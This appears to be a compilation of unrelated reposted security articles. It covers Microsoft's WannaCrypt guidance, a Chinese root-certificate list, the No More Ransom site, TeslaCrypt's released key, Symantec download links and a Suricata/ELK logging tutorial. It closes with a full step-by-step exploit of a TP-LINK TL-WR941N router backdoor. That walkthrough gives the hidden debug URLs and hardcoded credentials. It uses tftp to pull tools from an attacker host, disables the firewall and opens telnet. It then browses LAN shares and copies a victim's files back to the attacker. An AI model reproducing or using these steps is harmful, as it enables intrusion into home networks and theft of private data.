Customer Guidance for WannaCrypt attacks

 

https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Microsoft solution available to protect additional products

Today many of our customers around the world and the critical systems they depend on were victims of malicious “WannaCrypt” software. Seeing businesses and individuals affected by cyberattacks, such as the ones reported today, was painful. Microsoft worked throughout the day to ensure we understood the attack and were taking all possible actions to protect our customers. This blog spells out the steps every individual and business should take to stay protected. Additionally, we are taking the highly unusual step of providing a security update for all customers to protect Windows platforms that are in custom support only, including Windows XP, Windows 8, and Windows Server 2003. Customers running Windows 10 were not targeted by the attack today.

Details are below.

  • In March, we released a security update which addresses the vulnerability that these attacks are exploiting. Those who have Windows Update enabled are protected against attacks on this vulnerability. For those organizations who have not yet applied the security update, we suggest you immediately deploy Microsoft Security Bulletin MS17-010.
  • For customers using Windows Defender, we released an update earlier today which detects this threat as Ransom:Win32/WannaCrypt. As an additional “defense-in-depth” measure, keep up-to-date anti-malware software installed on your machines. Customers running anti-malware software from any number of security companies can confirm with their provider, that they are protected.
  • This attack type may evolve over time, so any additional defense-in-depth strategies will provide additional protections. (For example, to further protect against SMBv1 attacks, customers should consider blocking legacy protocols on their networks).

We also know that some of our customers are running versions of Windows that no longer receive mainstream support. That means those customers will not have received the above mentioned Security Update released in March. Given the potential impact to customers and their businesses, we made the decision to make the Security Update for platforms in custom support only, Windows XP, Windows 8, and Windows Server 2003, broadly available for download (see links below).

Customers who are running supported versions of the operating system (Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows 10, Windows Server 2012 R2, Windows Server 2016) will have received the security update MS17-010 in March. If customers have automatic updates enabled or have installed the update, they are protected. For other customers, we encourage them to install the update as soon as possible.

This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind.

Some of the observed attacks use common phishing tactics including malicious attachments. Customers should use vigilance when opening documents from untrusted or unknown sources. For Office 365 customers we are continually monitoring and updating to protect against these kinds of threats including Ransom:Win32/WannaCrypt. More information on the malware itself is available from the Microsoft Malware Protection Center on the Windows Security blog. For those new to the Microsoft Malware Protection Center, this is a technical discussion focused on providing the IT Security Professional with information to help further protect systems.

We are working with customers to provide additional assistance as this situation evolves, and will update this blog with details as appropriate.

Update 5/22/2017: Today, we released an update to the Microsoft Malicious Software Removal Tool (MSRT) to detect and remove WannaCrypt malware. For customers that run Windows Update, the tool will detect and remove WannaCrypt and other prevalent malware infections. Customers can also manually download and run the tool by following the guidance here. The MSRT tool runs on all supported Windows machines where automatic updates are enabled, including those that aren’t running other Microsoft security products.

Phillip Misner, Principal Security Group Manager  Microsoft Security Response Center

Further resources:

General information on ransomware

Protecting your PC from ransomware

MS17-010 security update

How to verify that MS17-010 is installed

Download English language security updates: Windows Server 2003 SP2 x64Windows Server 2003 SP2 x86, Windows XP SP2 x64Windows XP SP3 x86Windows XP Embedded SP3 x86Windows 8 x86, Windows 8 x64

Download localized language security updates: Windows Server 2003 SP2 x64Windows Server 2003 SP2 x86Windows XP SP2 x64Windows XP SP3 x86Windows XP Embedded SP3 x86Windows 8 x86Windows 8 x64

How to enable and disable SMB in Windows and Windows Server & GPO deployment

Guidance for Azure customers

Applying MS17-010 using Microsoft Intune

ConfigMgr SQL queries for reporting on KBs related to MS17-010

Guidance for Operations Management Suite customers

天朝颁发的证书一览表

原文:https://plus.google.com/+GhostAssassin/posts/DmZca2RVdTS

 

CFCA Operation CA //中国金融认证中心,<http://www.cfca.com.cn>,由某些网银插件带入
CFCA Operation CA2
CFCA Policy CA
CFCA Root CA

China Trust Network //天威, http://www.itrus.com.cn/

CNNIC ROOT //不解释

iTruschina CN Enterprise Individual Subscriber CA //天威
iTruschina CN Root CA-1
iTruschina CN Root CA-2
iTruschina CN Root CA-3

UCA Root //上海市数字证书认证中心,这个已经通过WebTrust认证, http://www.sheca.com
UCA Global Root

ROOTCA //中国政府的交叉根证书,安装国内CA的相关软件也带进来,自签发证书, http://www.rootca.gov.cn/

WoSign Premium Server Authority // https://www.wosign.cn/
WoSign SGC Server Authority

No More Ransom! 協助你一同對抗勒索病毒

https://www.nomoreransom.org/

 

 

近年來遭受勒索病毒(Ransomware)侵擾的機構層出不窮,其中不乏政府機關、醫院、學校或中小企業公司,甚至許多人的家用電腦都曾經中毒。一般來說,勒索病毒慣用手法是包裝在軟體或郵件附件,以其他格式偽裝,當使用者不小心執行後,它就會在電腦內進行部署,最終將所有檔案加密變成無法存取使用,跳出支付贖金來脅迫使用者取得解密金鑰恢復檔案,而且使用比特幣(Bitcoin)技術使嫌犯更難以被追蹤。

 

趨勢科技針對勒索軟體推出的免費復原工具 Trend Micro Ransomware File Decryptor,能有效對付某些類型勒索病毒,在不用支付贖金的情況下來強制重新復原救回檔案,這個工具目前支援包括 TeslaCrypt、CryptXXX、SNSLocker 等等在內共十多種勒索軟體類型。除此之外,本文要來介紹一個「No More Ransom」網站,一個勒索病毒主題入口網站,以專門對付勒索病毒為主,網站來頭不小,由 Intel Security、Interpol、荷蘭警方和卡巴斯基安全實驗室聯手打造!主要是協助使用者對抗危害,提供各種解密破解工具,讓使用者在不支付勒索贖金的情況下恢復重要文件檔案。

 

與其說 No More Ransom 是一個提供解密工具的網站,倒不如說他是一個教育使用者如何避免遇到勒索病毒危害的教育網站,內容簡單扼要一目了然,例如:備份資料、只打開認識且信任的聯絡人郵件附件、安裝防毒軟體、讓電腦軟體更新保持最新狀態,這些雖是老生常談,謹記在心準沒錯。

此外,No More Ransom 還提供線上勒索病毒檢測平台,使用者只要上傳自己被加密後的檔案,它就能從該組織擁有的 16 萬組解密金鑰中找出能夠解鎖的方式,還會讓你免費下載合適的復原工具,接下來我就簡單介紹一下 No More Ransom 這個網站的使用方法吧!

 

使用教學

STEP 1

開啟 No More Ransom! 網站後,首頁會直接詢問是否要協助你解鎖、復原你的檔案或文件,而不用支付給駭客贖金?點選 YES 後會進入檢測平台,如果點選 No 則會有一系列的防護安全資訊供使用者參考學習,不過目前僅有英文版。

 

STEP 2

No More Ransom! 的 Crypto Sherief 加密檔案自我檢測平台相當厲害,可能是目前網路唯一提供這項服務的網站!簡單來說,使用者只要點選左側兩個按鈕將被加密的任一兩個檔案選取、上傳,右側則是填入你在支付贖金頁面看到的 Email、網址,這部分需要確認無誤,以避免找不到可以解密的金鑰或工具,你也可以直接上傳勒索病毒留下來的訊息(.txt 或 .html 格式)。

最後,點選下方按鈕,No More Ransom! 就會找出可能可以解蜜、復原檔案的金鑰讓你免費下載,或者可能可以還原的免費工具。

 

STEP 3

在網站的 Decryption Tools 解密工具頁面,提供一系列可協助處理、還原或救援被勒索病毒加密後檔案的工具(CoinVault、RannohDecryptor、RakhniDecryptor、ShadeDecryptor),都有各自對應可以處理的勒索病毒副檔名格式。

不過在下載前請務必先閱讀使用說明,尤其要先確保勒索病毒已經從你的系統被完整移除,避免在解密後又被重新加密造成檔案損毀,任何可信賴的防毒軟體都能做到。

 

目前勒索軟體(勒索病毒)的數量相當多,而且不斷變種,有更多型態出現,現階段破解工具還無法涵蓋所有的勒索病毒,不過 No More Ransom! 網站提醒:盡量不支付贖金給這些病毒駭客,一來你會讓這些人認為有利可圖,進而找出更多方法來入侵其他使用者電腦;二來支付贖金獲取的解密金鑰也可能無法使用!讓你掉入被詐騙的陷阱當中。若你真的不幸中了勒索病毒,請記得先到 No More Ransom 網站找找解決辦法。

TeslaCrypt勒索软件作者突然道歉并放出主解密密钥

TeslaCrypt恶意勒索软件自去年爆发以来一直不断升级,目前的TeslaCrypt 3.0版本其破解难度也越来越高。越来越多用户一旦中招,导致文件被锁只能支付一定费用才能解锁。但是最近事情出现了戏剧性的转机,该恶意勒索软件的作者团队突然良心发现,宣布将中止开发恶意软件,并在网页向诸位道歉并公布了主解密密钥。

%image_alt%

占位除了简短的道歉和主密钥公布外,作者团队并未作过多解释。
占位在主解密密钥被公布了之后,许多安全团队立即放出了免费的TeslaCrypt解锁工具,理论上可以解锁各个版本被TeslaCrypt恶意勒索软件加密的文件。以下是ESET安全团队制作的免费解锁工具下载。

ESETTeslaCrypt免费解锁工具

——转自http://www.cnbeta.com/articles/503133.htm

Symantec Endpoint Protection

关于Symantec Endpoint Protection下载的问题,简便解决方案用户依次打开以下三个网站,保持不关闭!

http://www.symantec.com/zh/cn/index.jsp
http://www.symantec.com/zh/cn/norton/index.jsp
https://www4.symantec.com/Vrt/offer?a_id=48182

然后回到本帖,点击下边的下载地址,就可以下载最新 SEP 12.1.6 MP3 官方版:

简体中文版

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_CS.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_CS.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_CS.zip

繁体中文版

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_CH.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_CH.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_CH.zip

英文版

http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_Full_Installation_EN.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_SEPM_EN.exe
http://esdownload.symantec.com/akdlm/CD/MTV/Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients_EN.zip

个人使用就下载Symantec_Endpoint_Protection_12.1.6_MP3_All_Clients,也就是非受管理的客户端,变相完全免费!
说白一些:第一个和第二个受管理端,必须花钱。第三个非受管理端,变相个人完全免费!

Logstash Kibana and Suricata JSON output

https://redmine.openinfosecfoundation.org/projects/suricata/wiki/_logstash_kibana_and_suricata_json_output

 

With the release of Suricata 2.0rc1 , Suricata introduces all JSON output capability.
What is JSON – http://en.wikipedia.org/wiki/JSON

One way to handle easily Suricata’s JSON log outputs is through Kibana – http://kibana.org/ :

Kibana is a highly scalable interface for Logstash (http://logstash.net/) and ElasticSearch (http://www.elasticsearch.org/) that allows you to efficiently search, graph, analyze and otherwise make sense of a mountain of logs.

The installation is very simple/basic start up with minor specifics for ubuntu. You can be up and running, looking through the logs in under 5 min.
The downloads can be found here – http://www.elasticsearch.org/overview/elkdownloads/

This is what yo need to do.

Suricata

Make sure your Suricata is compiled/installed with libjansson support enabled:

$ suricata --build-info
This is Suricata version 2.0 RELEASE
Features: NFQ PCAP_SET_BUFF LIBPCAP_VERSION_MAJOR=1 AF_PACKET HAVE_PACKET_FANOUT LIBCAP_NG LIBNET1.1 HAVE_HTP_URI_NORMALIZE_HOOK HAVE_NSS HAVE_LIBJANSSON 
...
  libnss support:                          yes
  libnspr support:                         yes
  libjansson support:                     --> yes <--
  Prelude support:                         no
  PCRE jit:                                no
  libluajit:                               no
  libgeoip:                                yes
  Non-bundled htp:                         yes
  Old barnyard2 support:                   no
  CUDA enabled:                            no
...

If it isn’t check out the Suricata_installation page to install or compile Suricata for your distribution.
NOTE: you will need these packages installed -> libjansson4 and libjansson-dev before compilation.

Configure suricata

In your suricata.yaml

  # "United" event log in JSON format
  - eve-log:
      enabled: yes
      type: file #file|syslog|unix_dgram|unix_stream
      filename: eve.json
      # the following are valid when type: syslog above
      #identity: "suricata" 
      #facility: local5
      #level: Info ## possible levels: Emergency, Alert, Critical,
                   ## Error, Warning, Notice, Info, Debug
      types:
        - alert
        - http:
            extended: yes     # enable this for extended logging information
        - dns
        - tls:
            extended: yes     # enable this for extended logging information
        - files:
            force-magic: yes   # force logging magic on all logged files
            force-md5: yes     # force logging of md5 checksums
        #- drop
        - ssh
        - smtp
        - flow

Install ELK (elasticsearch, logstash, kibana)

First install the dependencies
(
NOTE:
ELK recommends running with Oracle Java – how to ->
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/setup-service.html#_installing_the_oracle_jdk
)

Otherwise you can install the openjdk:

apt-get install apache2 openjdk-7-jdk openjdk-7-jre-headless

Then download and install the software.

Make sure you download the latest versions –
http://www.elasticsearch.org/overview/elkdownloads/
The installation process is simple (for example):

wget https://download.elasticsearch.org/kibana/kibana/kibana-3.0.0.tar.gz
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.6.1.deb
wget https://download.elastic.co/logstash/logstash/packages/debian/logstash_1.5.3-1_all.deb

tar -C /var/www/ -xzf kibana-3.0.0.tar.gz
dpkg -i elasticsearch-1.6.1.deb
dpkg -i logstash_1.5.3-1_all.deb

Logstash configuration

Create and save a logstash.conf file with the following content in the /etc/logstash/conf.d/ directory :

touch /etc/logstash/conf.d/logstash.conf

Insert the following(make sure the directory path is correct):

input {
  file { 
    path => ["/var/log/suricata/eve.json"]
    sincedb_path => ["/var/lib/logstash/"]
    codec =>   json 
    type => "SuricataIDPS" 
  }

}

filter {
  if [type] == "SuricataIDPS" {
    date {
      match => [ "timestamp", "ISO8601" ]
    }
    ruby {
      code => "if event['event_type'] == 'fileinfo'; event['fileinfo']['type']=event['fileinfo']['magic'].to_s.split(',')[0]; end;" 
    }
  }

  if [src_ip]  {
    geoip {
      source => "src_ip" 
      target => "geoip" 
      #database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat" 
      add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
      add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}"  ]
    }
    mutate {
      convert => [ "[geoip][coordinates]", "float" ]
    }
    if ![geoip.ip] {
      if [dest_ip]  {
        geoip {
          source => "dest_ip" 
          target => "geoip" 
          #database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat" 
          add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
          add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}"  ]
        }
        mutate {
          convert => [ "[geoip][coordinates]", "float" ]
        }
      }
    }
  }
}

output { 
  elasticsearch {
    host => localhost
    #protocol => http
  }
}

Configure the start-up services

update-rc.d elasticsearch defaults 95 10
update-rc.d logstash defaults

service apache2 restart
service elasticsearch start
service logstash start

Enjoy

That’s all. Now make sure Suricata is running and you have logs written in your JSON log files and you point your browser towards ->

http://localhost/kibana-3.0.0

NOTE:
Some ready to use templates – Templates for Kibana/Logstash to use with Suricata IDPS

From here on if you would like to customize and familiarize yourself more with the interface you should read the documentation about Kibana and Logstash.
Please have in mind that this is a very quick(under 5 min) tutorial. You should customize and review the proper way for you of using it as a service and/or consider using httpS web interface and reversy proxy with some authentication.

Some possible customization of the output of Logstash and Kibana – >

TP-LINK 路由器后门

  近期,“TP-LINK漏洞门”事件被CNVD(国家信息安全漏洞共享平台)曝光后,在社会上引起了极大的关注。由于TP-LINK的市场占有率达到70%,很多网友担心自己的信息是否被泄露。

  据一位资深黑客介绍,TP-LINK路由器的后门漏洞危险程度远远大于目前披露的程度。他解释,在攻击漏洞的TP-LINK路由器时,并非一定要在本地连接路由器,而是可以通过远程进入TP-LINK路由器,从而监控网友的所有上网行为,并且能够窃取本地信息。也就是说,控制了用户的TP-LINK路由器之后,也就可以监控用户的上网行为,随意从网友的电脑里窃取一切信息,不管是隐私信息还是重要资料都可以信手拈来,而用户根本不知道。

  他做了一个演示,利用TP-LINK存在的后门漏洞,轻松的监控用户的上网行为,用户在QQ里面聊了什么,在淘宝上面买了什么东西,他都能够一目了然,在他的眼里看来,用户就是一个完全透明的人。而且,他还可以利用TP-LINK的漏洞进入用户的电脑,不管用户是在欧洲拍的婚纱照,还是在家里和爱人拍的隐私照,只要他想盗取随时都可以,完全没有隐私可言。

  他还介绍,TP-LINK的后门漏洞存在多年,一直都没有被TP-LINK重视,而TP-LINK的市场占有率达到70%以上。所以,很多隐私泄露都与TP-LINK有关,不然黑客怎么可能获得用户的隐私照片和银行账号,很多都是利用TP-LINK的漏洞完成的,只是用户根本不知道而已。国内用水星和迅捷的用户也难免厄运,因为水星和迅捷都是TP-LINK的马甲,只要能够找到TP-LINK路由器的漏洞,就能随意进入水星和迅捷路由器用户的电脑。就目前来说,TP-LINK的路由器大多存在问题,要想保证绝对安全几乎不大可能。

  以下是黑客利用TP-LINK路由器后门漏洞盗取用户信息的演示:

  一、环境拓扑图

  图1 环境拓扑图

  拓扑图说明:

  1、PC2使用公网IP,或者是连接公网的路由器下的DMZ设备;

  2、TP-Link开启远程WEB访问,示例中的8011为远程WEB访问端口;

  3、PC2要开启TFTP服务器;

  4、TP-Link设备型号:TL-WR941N,实物图请见附录。

  二、操作步骤

  1、在TP-Link设备联网情况下开启远程WEB访问,如图2、图3

  图2

  图3

  2、PC2设备在联网情况下,在地址栏输入http://xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/start_art.html(xxx.xxx.xxx.xxx为TP-Link设备的WAN口IP,8011为远程WEB访问的端口号),等待1分钟左右出现如下页面,如图4所示

  图4

  3、PC2在地址栏输入http://xxx.xxx.xxx.xxx:8011/userRpmNatDebugRpm26525557/linux_cmdline.html,出现TP-LINK设备的登录页面,输入设备管理的用户名和密码(用户名:admin,密码:admin),进入以下页面(如图5所示),这个页面需要的用户名是:osteam,密码是:5up。在这个页面我们就可以大展拳脚了。接下来我们就利用漏洞来访问TP-link局域网下的共享

  图5

  4、PC2开启tftp服务器,并在tftp服务器路径下放置busybox/libbigballofmud.so/smbclient/smbtree文件(后面会将这几个文件通过tftp导入到TP-Link设备的/tmp目录下)。在设备页面的指令栏输入tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa为PC2的公网IP地址)。出现如下页面(图6)

  图6

  5、导入完成后在指令栏输入ls -l,发现目录下有了busybox,如图7

  图7

  6、在指令栏输入chmod 777 busybox,然后输入ls –l,发现busybox的权限改为777,如图8

  图8

  7、在指令栏输入iptables -P INPUT ACCEPT/iptables -P FORWARD ACCEPT/iptables –F,如图9。这几条命令是改变防火墙的过滤规则,操作后,该设备的防火墙就形同虚设了。

  图9

  8、在指令栏输入./busybox telnetd,开启远程telnet,如图10。接下来我们就可以telnet该设备而不再依赖页面了。

  图10

  9、telnet TP-Link设备,这里的用户名root,密码5up。如图11,我已成功telnet到TP-Link的后台了,现在我们已经成功了一半了。

  图11

  10、在telnet窗口输入cd /tmp,进入该目录后先后输入tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/tftp -g -r smbclient aaa.aaa.aaa.aaa/tftp -g -r smbtree aaa.aaa.aaa.aaa(这几个命令是将libbigballofmud.so/smbtree/smbclient通过TFTP导入到TP-Link的/tmp目录下,所以要确保PC2开启TFTP服务器)。如图12所示,已成功导入

  图12

  11、在telnet界面输入以下命令(如图13所示)

  mount tmpfs /usr -t tmpfs

  /tmp/busybox mkdir -p /usr/lib

  /tmp/busybox cp /tmp/*so* /usr/lib/ -fr

  /tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0

  chmod 777 smbtree

  chmod 777 smbclient

  图13

  12、在/tmp目录下执行./smbtree命令,即可搜索到该局域网下的共享文件信息,图14

  图14

  13、执行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb为图14搜索到的一个共享文件目录),密码为空,进入文件夹后执行ls,显示该文件夹下的文件类容,如图15

  图15

  14、通过索引目录,可以查询到每一个目录下的文件信息,如/mnt/files/cherryblossoms1.jpg。如图16所示。接下来我们就看看cherryblossoms1.jpg是一个什么图片。

  图16

  15、将共享文件拷贝到TP-Link设备上的/tmp目录下,执行命令get ccc(ccc为要拷贝的共享文件,如图17中的cherryblossoms1.jpg)

  图17

  16、将文件通过tftp拷贝到本地设备上,执行命令/tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。如图18所示

  图18

  17、在本地设备的tftp所在目录下打开拷贝的文件,如图19、图20

  图19

  图20

  注意事项:

  1、TP-Link设备需要开启远程WEB访问,示例中的8011为远程WEB访问的端口

  2、本地设备最好使用公网IP,或者是连接公网的路由器下的DMZ设备

  3、本地设备要开启TFTP服务器

  4、busybox/libbigballofmud.so/smbclient/smbtree需要拷贝在TP-Link下的/tmp目录下

  5、示例中的xxx.xxx.xxx.xxx为TP-link设备WAN口IP,aaa.aaa.aaa.aaa为PC2的公网IP,//bbbb/bbbbbb为搜索到的一个共享目录,ccc为共享目录下的一个共享文件

  6、需要用到的工具有:tftpd32.exe、busybox、libbigballofmud.so、smbclient、smbtree

  附录:TL-WR941N实物图

  图21

  图22

  图23